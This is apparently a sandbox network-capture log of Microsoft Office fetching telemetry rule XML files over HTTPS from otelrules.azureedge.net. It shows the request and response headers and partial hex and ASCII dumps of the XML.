2024-11-05 17:46:13 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	49836	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:13 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:13 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:13 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 2ce7ce6f-901e-002a-1fd2-2c7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174613Z-16547b76f7fp6mhthC1DFWrggn00000005mg000000009fpk x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:13 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	49838	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:14 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:14 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:14 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: 4630a231-e01e-0020-14ff-2bde90000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174614Z-16547b76f7fj897nhC1DFWdwq400000005d0000000002qy3 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:14 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.4	49839	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:14 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:14 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:14 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: 689e16da-301e-000c-0a55-2e323f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174614Z-17df447cdb5vq4m4hC1DFWrbp800000001mg000000005m5p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:14 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	49840	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:14 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:14 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:14 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 908d3df5-401e-0064-7501-2f54af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174614Z-17df447cdb5bz95mhC1DFWnk7w00000001kg00000000001q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:14 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	49837	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:14 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:14 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:14 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 6a4bbae2-b01e-0053-568e-2dcdf8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174614Z-15869dbbcc6gt87nhC1DFWh9un00000005a000000000hbpf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:14 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	49842	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:15 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:15 UTC	515	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:15 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: a0cc50e9-d01e-0066-4e5c-2eea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174615Z-15869dbbcc6kg5mvhC1DFWkb5w00000005h000000000b6wa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:46:15 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	49843	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:15 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:15 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:15 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 157887d5-b01e-0084-44d2-2cd736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174615Z-16547b76f7f7scqbhC1DFW0m5w000000057g00000000u6d0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:15 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	49841	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:15 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:15 UTC	515	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:15 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: 4bf7326f-801e-00ac-6855-2efd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174615Z-15869dbbcc6lq2lzhC1DFWym6c00000000gg000000004ncz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:46:15 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	49844	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:15 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:15 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:15 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: c6a80355-b01e-0070-0e08-2c1cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174615Z-16547b76f7fj5p7mhC1DFWf8w400000005fg00000000uc8v x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:15 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	49846	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:15 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:16 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:16 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: 09c80ed2-701e-003e-5d5f-2e79b3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174616Z-17df447cdb5lrwcchC1DFWphes00000001rg000000006kn4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:16 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	49847	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:16 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:16 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:16 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: 3ec3caa0-a01e-006f-718e-2d13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174616Z-15869dbbcc6rmhmhhC1DFWd7b800000005gg000000004abr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:16 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	49848	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
